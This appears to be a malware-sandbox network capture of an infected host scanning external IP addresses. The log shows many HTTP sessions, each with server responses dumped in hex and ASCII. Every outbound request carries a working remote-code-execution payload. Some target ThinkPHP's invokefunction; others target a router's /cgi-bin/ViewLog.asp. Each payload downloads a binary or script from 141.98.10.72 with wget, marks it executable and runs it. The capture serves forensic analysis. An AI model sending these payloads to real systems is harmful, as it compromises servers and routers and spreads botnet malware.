                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:04.466608047 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:04 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:04 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 30 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 34 26 23 34 36 3b 63 33 32 33 36 66 62 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;50c91002&#46;1707899344&#46;c3236fb8</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            506192.168.2.233602895.215.240.13680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.265978098 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:04.517589092 CET420INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                            Server: Apache/2.2.15 (CentOS)
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            507192.168.2.233436695.86.77.1380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.270457983 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            508192.168.2.233988431.200.93.2478080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.302952051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            509192.168.2.235372631.200.112.928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.303225994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            510192.168.2.234148295.56.17.3180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.304538965 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:04.596151114 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:29:04.596373081 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            511192.168.2.235801685.66.44.208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.575445890 CET334INHTTP/1.0 400 Bad Request
                                                            Server: httpd/2.0
                                                            x-frame-options: SAMEORIGIN
                                                            x-xss-protection: 1; mode=block
                                                            Date: Wed, 14 Feb 2024 08:31:23 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            512192.168.2.233760062.149.5.1578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:05.806685925 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:06.043390989 CET502INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                            Server: Apache
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            513192.168.2.234049062.29.32.1928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:05.821850061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            514192.168.2.233531294.123.12.1908080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:05.822269917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            515192.168.2.233730294.122.197.1528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:05.823823929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            516192.168.2.2347128112.213.117.1080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:05.894403934 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:06.190840960 CET594INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                            Server: Apache/2.4.43
                                                            Content-Length: 409
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 33 20 53 65 72 76 65 72 20 61 74 20 75 70 75 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.43 Server at upupw Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            517192.168.2.2355390112.196.118.12380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:05.983813047 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:06.361293077 CET349INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 08:29:06 GMT
                                                            Server: xxxx
                                                            X-Frame-Options: SAMEORIGIN
                                                            Last-Modified: Thu, 11 Oct 2018 07:19:39 GMT
                                                            ETag: "30-577eecb3938c0"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 48
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 34 3e 20 48 74 74 70 20 45 72 72 6f 72 3a 34 30 34 20 50 61 67 65 20 64 6f 65 73 20 4e 6f 74 20 45 78 69 73 74 73 20 21 20 3c 2f 68 34 3e
                                                            Data Ascii: <h4> Http Error:404 Page does Not Exists ! </h4>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            518192.168.2.233460295.214.145.138080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:06.014170885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            519192.168.2.233578631.135.14.1538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:06.037806988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:06.269259930 CET412INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 08:30:06 GMT
                                                            Server: Apache/2.4.52 (Win64)
                                                            Content-Length: 196
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            520192.168.2.233395462.232.255.1068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:06.066648960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:06.269788027 CET701INHTTP/1.0 404 Not Found !!!
                                                            Pragma: no-cache
                                                            Content-type: text/html
                                                            WWW-Authenticate: /cgi-bin/ViewLog.asp
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 63 65 6e 74 65 72 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 31 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 30 30 41 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 66 61 63 65 3d 22 41 72 69 61 6c 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 33 46 33 46 33 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 22 23 30 30 30 30 38 30 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 64 61 72 6b 3d 22 23 30 30 30 30 38 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 69 6e 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            521192.168.2.233498088.198.21.24880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:06.099416018 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:06.304338932 CET615INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:06 GMT
                                                            Server: Apache/2.4.7 (Ubuntu) mod_uwsgi/1.0 SVN/1.8.8 mod_fastcgi/mod_fastcgi-SNAP-0910052141 Phusion_Passenger/6.0.2 PHP/5.5.9-1ubuntu4.29 mod_python/3.3.1 Python/2.7.6 OpenSSL/1.0.1f mod_wsgi/3.4 mod_perl/2.0.8 Perl/v5.18.2
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
